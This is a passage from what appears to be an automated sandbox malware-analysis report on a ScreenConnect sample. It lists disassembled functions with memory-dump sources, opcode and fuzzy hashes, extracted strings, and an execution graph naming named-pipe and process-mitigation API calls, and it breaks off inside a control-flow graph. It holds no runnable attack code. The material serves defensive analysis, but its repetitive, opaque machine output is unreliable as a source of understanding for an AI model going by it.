                                                                                                              • Opcode Fuzzy Hash: c06c7784e51f4a515ecd29b51dcc8253d1f6e1fe8846d96e9b5118cf270848bd
                                                                                                              • Instruction Fuzzy Hash: BFD0123220121687EF249E9EE410395B7D9DF80375F148A3BA58CC6558D576588187C1
                                                                                                              Function 048D8C18 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction ID: 765e083f51cfe42c30107d480a3c1ca6b03fd1adecb74f0732214d2a20c255cd
                                                                                                              • Opcode Fuzzy Hash: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction Fuzzy Hash: DEE0E535E103098ACB01DBA4E8406DCFB71FF86325F108656E50477110E7712AD9CB81
                                                                                                              Function 048D8FF9 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction ID: 765e083f51cfe42c30107d480a3c1ca6b03fd1adecb74f0732214d2a20c255cd
                                                                                                              • Opcode Fuzzy Hash: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction Fuzzy Hash: DEE0E535E103098ACB01DBA4E8406DCFB71FF86325F108656E50477110E7712AD9CB81
                                                                                                              Function 048D88C9 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction ID: 765e083f51cfe42c30107d480a3c1ca6b03fd1adecb74f0732214d2a20c255cd
                                                                                                              • Opcode Fuzzy Hash: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction Fuzzy Hash: DEE0E535E103098ACB01DBA4E8406DCFB71FF86325F108656E50477110E7712AD9CB81
                                                                                                              Function 048D9005 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction ID: 765e083f51cfe42c30107d480a3c1ca6b03fd1adecb74f0732214d2a20c255cd
                                                                                                              • Opcode Fuzzy Hash: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction Fuzzy Hash: DEE0E535E103098ACB01DBA4E8406DCFB71FF86325F108656E50477110E7712AD9CB81
                                                                                                              Function 048D8B14 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction ID: 765e083f51cfe42c30107d480a3c1ca6b03fd1adecb74f0732214d2a20c255cd
                                                                                                              • Opcode Fuzzy Hash: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction Fuzzy Hash: DEE0E535E103098ACB01DBA4E8406DCFB71FF86325F108656E50477110E7712AD9CB81
                                                                                                              Function 048D8B20 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction ID: 765e083f51cfe42c30107d480a3c1ca6b03fd1adecb74f0732214d2a20c255cd
                                                                                                              • Opcode Fuzzy Hash: 6a14f910a9737897e619e967962d5e3769690c5b1b8f60afa0362ebf8f67193f
                                                                                                              • Instruction Fuzzy Hash: DEE0E535E103098ACB01DBA4E8406DCFB71FF86325F108656E50477110E7712AD9CB81
                                                                                                              Function 03706E70 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                                                              • Instruction ID: 264f0ad88ceef714b04f5cf02ed60c8c9c1673b50b1de636bae8313d90e66d6f
                                                                                                              • Opcode Fuzzy Hash: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                                                              • Instruction Fuzzy Hash: CAE09271D002299F8B80EFA9D9015AEFBF4EF48210B10846A9918E7201E3329A128BC1
                                                                                                              Function 048DDB4F Relevance: .0, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d0c00639dde16697a4815fbf016b92abcf587f9403c9c9b94200c01f5108861b
                                                                                                              • Instruction ID: ad5344d473ea34cb78ae8eb6f2e19bdf37eebe7b4b5c2d4300c2c04b3f352f16
                                                                                                              • Opcode Fuzzy Hash: d0c00639dde16697a4815fbf016b92abcf587f9403c9c9b94200c01f5108861b
                                                                                                              • Instruction Fuzzy Hash: 84E02B31106202CBEF20164DE0103F6B7C1DF40325F344B37A048C6668C2724C8287C0
                                                                                                              Function 03700BE2 Relevance: .0, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 39b71ba79761acfb78393702afffacd49e17ac944357450cddc4ff38005b5187
                                                                                                              • Instruction ID: f2c63197fc33cb0c7cedf8adfd5060092311ebdce05a05a612331d909ba9e16e
                                                                                                              • Opcode Fuzzy Hash: 39b71ba79761acfb78393702afffacd49e17ac944357450cddc4ff38005b5187
                                                                                                              • Instruction Fuzzy Hash: D5E04F314057498FC702EF78D9A55A8BB70FE96200B0CCA8AD4855B222DB71A195EB41
                                                                                                              Function 048D27F1 Relevance: .0, Instructions: 18COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2ae93a4468d4dd898f2353cdec5adda7b42713ff77b1476981ebdaa5ef478ff8
                                                                                                              • Instruction ID: 51b9091c7f0ec2d808f3322e5f78d99084c972308f0364d7e5b56267ceffa8e8
                                                                                                              • Opcode Fuzzy Hash: 2ae93a4468d4dd898f2353cdec5adda7b42713ff77b1476981ebdaa5ef478ff8
                                                                                                              • Instruction Fuzzy Hash: 6AE08C646047018FD7118F28D48482177B0BF8A20430286EAE4458F3B6EB34E941C7A1
                                                                                                              Function 037067E0 Relevance: .0, Instructions: 18COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2790398a7ebbe72d901b524f67302ec57a5ec467d4d35a757436e0256babea39
                                                                                                              • Instruction ID: f8558ac1e188575918461028428398aa6476c74194641717ea67212908f7bd92
                                                                                                              • Opcode Fuzzy Hash: 2790398a7ebbe72d901b524f67302ec57a5ec467d4d35a757436e0256babea39
                                                                                                              • Instruction Fuzzy Hash: 4BD05E343601148FC784E73CE44496A73DAAF899203908075E40DCB320EE21EC4147D0
                                                                                                              Function 048D4010 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 352c7077bc3118b42aa62bce9196ec621e7820a37ea150538af69602e295373e
                                                                                                              • Instruction ID: 09651e3abedbd756d53894e26b557fe3904280428dc7c94ae87096706d5cf701
                                                                                                              • Opcode Fuzzy Hash: 352c7077bc3118b42aa62bce9196ec621e7820a37ea150538af69602e295373e
                                                                                                              • Instruction Fuzzy Hash: BCD01730A0020DEB8B40EFA9E94265DBBF9EB44220B1046AAD40CD3241EB316F049B90
                                                                                                              Function 03702EC0 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7e91ae5a31f61771740849be2992a7a411d2934204cd1a88633a53fb2e2ac91
                                                                                                              • Instruction ID: 78768af71a2a1f7192eaf69dcd93d0388b98b048798512418ee0ea2b8e115dbf
                                                                                                              • Opcode Fuzzy Hash: a7e91ae5a31f61771740849be2992a7a411d2934204cd1a88633a53fb2e2ac91
                                                                                                              • Instruction Fuzzy Hash: F6D01734A0120DEF8B04EFA8E90659DBBF9EB45200B1045A9D80CD7200EB322F489B80
                                                                                                              Function 037078E0 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5a9e32a00f3d4d641e66cdc806c81a37bc902d0c29530832113ed49537eab967
                                                                                                              • Instruction ID: 5886b6667aa67344873635458b52deaa10b36ccc5bd560866675e0e32de6dff0
                                                                                                              • Opcode Fuzzy Hash: 5a9e32a00f3d4d641e66cdc806c81a37bc902d0c29530832113ed49537eab967
                                                                                                              • Instruction Fuzzy Hash: 13D01730A4120EEB9B00EFB8E90165DB7F9EB44200B1447A8D40DD3200EB316F149B90
                                                                                                              Function 048D3AED Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0517bff3022ce39d9e60013a85cafa09bdc533a40eb71894b3b405fae54bdcda
                                                                                                              • Instruction ID: b5fadbc6e2a4a65912b26862c1ebad4501a125ebb1bc37160a09abcc9bb991f8
                                                                                                              • Opcode Fuzzy Hash: 0517bff3022ce39d9e60013a85cafa09bdc533a40eb71894b3b405fae54bdcda
                                                                                                              • Instruction Fuzzy Hash: EFE05BB5506540CFC702CF78D584C847FB09F6560831A82C6D049CB323C631E905CB51
                                                                                                              Function 03700BF0 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aea8d700979a839deb4d8be51d2089ef1a70a4b15102887b05a34aad9bc7a680
                                                                                                              • Instruction ID: d23a9d311016ab8cdcea06738769fc0043b1cf7f9bad484c648b0685107dfd34
                                                                                                              • Opcode Fuzzy Hash: aea8d700979a839deb4d8be51d2089ef1a70a4b15102887b05a34aad9bc7a680
                                                                                                              • Instruction Fuzzy Hash: 4AD0C73141470D89C701BB78D4544A9F778EED5200F00CB5AE44957121FF70D5D0D681
                                                                                                              Function 048D0E10 Relevance: .0, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89e106ae7ab7cbec0d0e31ecccac2934c57872752e3267abc463abed1a3758db
                                                                                                              • Instruction ID: 63913bfaf9569dfbc35bdd59931840e7e918f72c00862e0477c79981a37c055b
                                                                                                              • Opcode Fuzzy Hash: 89e106ae7ab7cbec0d0e31ecccac2934c57872752e3267abc463abed1a3758db
                                                                                                              • Instruction Fuzzy Hash: 18D01276015200AFD7129B60A905F407F61FF65309F0788A4F1495B132DB214021DB92
                                                                                                              Function 048DFCB1 Relevance: .0, Instructions: 10COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 039dbb949224a94060d5f59024c9e8ba391646d7f1e27d273cabb54e6582136e
                                                                                                              • Instruction ID: a16fcbd1cb31c29ff8e9e97743da277d3147b8ffa0d3eb04b26bfa0e5cbc1345
                                                                                                              • Opcode Fuzzy Hash: 039dbb949224a94060d5f59024c9e8ba391646d7f1e27d273cabb54e6582136e
                                                                                                              • Instruction Fuzzy Hash: 01C04CA584D7814FDF16076158A90C52F70DA5A20134784D6C05785452995CC54BC711
                                                                                                              Function 048D3B00 Relevance: .0, Instructions: 9COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 36f8bfab13cd057fd3552da75a2089a267d0e53626c1d187abbf0cf2a6b65772
                                                                                                              • Instruction ID: 50febbe312b41ff2c4c3a49cd703755e7e3a6811debab3536aaf097181569e9c
                                                                                                              • Opcode Fuzzy Hash: 36f8bfab13cd057fd3552da75a2089a267d0e53626c1d187abbf0cf2a6b65772
                                                                                                              • Instruction Fuzzy Hash: D3C002792501048F8700DB58E688C117BE8AB486143258194E5088B322C621FC018A91
                                                                                                              Function 03704C90 Relevance: .0, Instructions: 9COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 31886de6e0853851dab88549b0286ab42aed480dfdc09825fad50571946c1f1b
                                                                                                              • Instruction ID: ecc656c35895e1f8ae178bd5a501ec5e836ba9443b0bf4c9557ce5a95d720c3c
                                                                                                              • Opcode Fuzzy Hash: 31886de6e0853851dab88549b0286ab42aed480dfdc09825fad50571946c1f1b
                                                                                                              • Instruction Fuzzy Hash: 6AC0484240E7E06EDB03A6310E69A4A7E206A835523CDC1CEC8868F15791189918A6B3
                                                                                                              Function 048D748F Relevance: .0, Instructions: 7COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d03c6c3d46a9ec55475b1a61b4fa9c1f178b675aca84af734de6575c0a12e33
                                                                                                              • Instruction ID: 3b4f0e3faff8519a2ab7d925c824fdb9e9396ff951742404309c4a5a10b463a6
                                                                                                              • Opcode Fuzzy Hash: 6d03c6c3d46a9ec55475b1a61b4fa9c1f178b675aca84af734de6575c0a12e33
                                                                                                              • Instruction Fuzzy Hash: AAB092351884448FC700CB78D484C887BB0AF1922431102D9E00ECB633C262D802CE00
                                                                                                              Function 048D7490 Relevance: .0, Instructions: 7COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9e531c7556f3d527dcef1ec037cf9e2717eba03a4d407757c40db45949829b8d
                                                                                                              • Instruction ID: fba1df006ee47b4d62fcc1013010dd0c3d3c4d475ad279116ed82f1df4468255
                                                                                                              • Opcode Fuzzy Hash: 9e531c7556f3d527dcef1ec037cf9e2717eba03a4d407757c40db45949829b8d
                                                                                                              • Instruction Fuzzy Hash: D6B092311502088F82009B58D444C0073A8AB08A243010090E1088B232C621FC018A40

                                                                                                              Non-executed Functions

                                                                                                              Function 00BFD588 Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4012479988.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_bf0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DUu
                                                                                                              • API String ID: 0-1869729964
                                                                                                              • Opcode ID: 7a98a9b428529c33e0b2a611168b1cc86beba3320d04fbfc51109cdd1d87c4d5
                                                                                                              • Instruction ID: 43cb8a2a555117eb0d8ea01a82bb4c9903991a979b2d85c2685fc529dc67a846
                                                                                                              • Opcode Fuzzy Hash: 7a98a9b428529c33e0b2a611168b1cc86beba3320d04fbfc51109cdd1d87c4d5
                                                                                                              • Instruction Fuzzy Hash: B5E15031D1061ADFCB05DFA8C8405DDFBF2FF99310B25865AE515BB210EB30AA86CB90

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:10.6%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:11
                                                                                                              Total number of Limit Nodes:1
                                                                                                              execution_graph 18819 7ffd34413642 18820 7ffd34435860 CreateNamedPipeW 18819->18820 18822 7ffd34435993 18820->18822 18823 7ffd34413662 18824 7ffd34435a00 ConnectNamedPipe 18823->18824 18826 7ffd34435ab2 18824->18826 18827 7ffd34418014 18829 7ffd3441801d 18827->18829 18828 7ffd34418082 18829->18828 18830 7ffd344180f6 SetProcessMitigationPolicy 18829->18830 18831 7ffd34418152 18830->18831

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD34726981 Relevance: 9.9, Strings: 7, Instructions: 1164COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: H]C4$PMA4$XMA4$h4q4$h4q4$hlq4$hnq4
                                                                                                              • API String ID: 0-2134097874
                                                                                                              • Opcode ID: b45fd8d4536aaf467fb373fff006cd80dc111db139d8d4ddfb6f82a3855e30bf
                                                                                                              • Instruction ID: 1a9bc8bc6d6c356e2277ab22ed6c583baddb286790ee1b91bac65f23f322f2d3
                                                                                                              • Opcode Fuzzy Hash: b45fd8d4536aaf467fb373fff006cd80dc111db139d8d4ddfb6f82a3855e30bf
                                                                                                              • Instruction Fuzzy Hash: A9820771B1DA4A8FEBA99B2894F56F933E1EF96380F14007AD54DC72D6DD2CB8059380
                                                                                                              Function 00007FFD34729596 Relevance: 8.2, Strings: 5, Instructions: 1918COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0\C4$8/|4$`\C4$p\C4$0q4
                                                                                                              • API String ID: 0-260573158
                                                                                                              • Opcode ID: 382fc8b3639191806a9743fa60e7374a091d8e3838dc0647902882be30626bb5
                                                                                                              • Instruction ID: d7ecbd479eb7445604540729c25ca0ca08b9282c475a276d9ad93e6df04d1f05
                                                                                                              • Opcode Fuzzy Hash: 382fc8b3639191806a9743fa60e7374a091d8e3838dc0647902882be30626bb5
                                                                                                              • Instruction Fuzzy Hash: EEF24C70A086198FDBA9DB28C8A47A8B7F1FF59300F5441F9D50DE7291DE39AD81DB80
                                                                                                              Function 00007FFD347203F2 Relevance: 5.6, Strings: 4, Instructions: 630COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1255 7ffd347203f2-7ffd3472042a 1260 7ffd34720460-7ffd34720482 1255->1260 1261 7ffd3472042c-7ffd34720441 1255->1261 1266 7ffd34720483-7ffd3472048e 1260->1266 1261->1266 1267 7ffd34720443-7ffd3472045a 1261->1267 1269 7ffd34720490-7ffd347204c6 1266->1269 1270 7ffd347204d8-7ffd34720500 1266->1270 1267->1269 1273 7ffd3472045c-7ffd3472045f 1267->1273 1278 7ffd34720502-7ffd34720521 1270->1278 1279 7ffd34720524-7ffd3472053c 1270->1279 1273->1260 1283 7ffd3472053e-7ffd3472055d 1279->1283 1284 7ffd34720560-7ffd3472057e 1279->1284 1283->1284 1288 7ffd34720580-7ffd34720590 1284->1288 1289 7ffd3472059a 1284->1289 1292 7ffd34720597-7ffd34720598 1288->1292 1291 7ffd3472059f-7ffd347205a5 1289->1291 1293 7ffd3472063e-7ffd34720641 1291->1293 1294 7ffd347205ab-7ffd347205b4 1291->1294 1292->1289 1297 7ffd34720643-7ffd3472064d 1293->1297 1295 7ffd347205cd-7ffd347205d8 1294->1295 1296 7ffd347205b6-7ffd347205c3 1294->1296 1299 7ffd34720624-7ffd34720632 1295->1299 1300 7ffd347205da-7ffd347205f7 1295->1300 1296->1295 1301 7ffd347205c5-7ffd347205cb 1296->1301 1302 7ffd34720655-7ffd34720672 1297->1302 1299->1293 1305 7ffd347205fd-7ffd34720622 1300->1305 1306 7ffd347208e2-7ffd3472093f 1300->1306 1301->1295 1312 7ffd347206ee-7ffd347206fa 1302->1312 1313 7ffd34720674 1302->1313 1305->1299 1338 7ffd34720941-7ffd3472094a 1306->1338 1339 7ffd3472094b-7ffd34720952 1306->1339 1316 7ffd34720700-7ffd34720701 1312->1316 1317 7ffd347206fc-7ffd347206fe 1312->1317 1318 7ffd34720676-7ffd3472067a 1313->1318 1319 7ffd347206ba-7ffd347206c6 1313->1319 1322 7ffd34720702-7ffd3472070e call 7ffd347200e0 1316->1322 1321 7ffd34720711-7ffd3472072e 1317->1321 1323 7ffd3472067c-7ffd34720681 1318->1323 1324 7ffd347206eb-7ffd347206ec 1318->1324 1326 7ffd347206c8-7ffd347206ca 1319->1326 1327 7ffd347206cc-7ffd347206da call 7ffd347200e0 1319->1327 1343 7ffd34720730-7ffd34720732 1321->1343 1344 7ffd34720734-7ffd34720742 call 7ffd347200e0 1321->1344 1322->1321 1323->1322 1331 7ffd34720683-7ffd3472068e 1323->1331 1324->1312 1329 7ffd347206dd-7ffd347206fa 1326->1329 1327->1329 1329->1316 1329->1317 1336 7ffd34720690-7ffd347206b6 call 7ffd347200c0 1331->1336 1337 7ffd347206ff 1331->1337 1352 7ffd34720800-7ffd3472081e call 7ffd347200c0 * 2 1336->1352 1353 7ffd347206bc-7ffd347206c6 1336->1353 1337->1316 1340 7ffd3472095e-7ffd34720969 1339->1340 1341 7ffd34720954-7ffd3472095d 1339->1341 1348 7ffd34720745-7ffd34720762 1343->1348 1344->1348 1356 7ffd34720764-7ffd34720766 1348->1356 1357 7ffd34720768-7ffd34720776 call 7ffd347200e0 1348->1357 1367 7ffd347208bd-7ffd347208df 1352->1367 1368 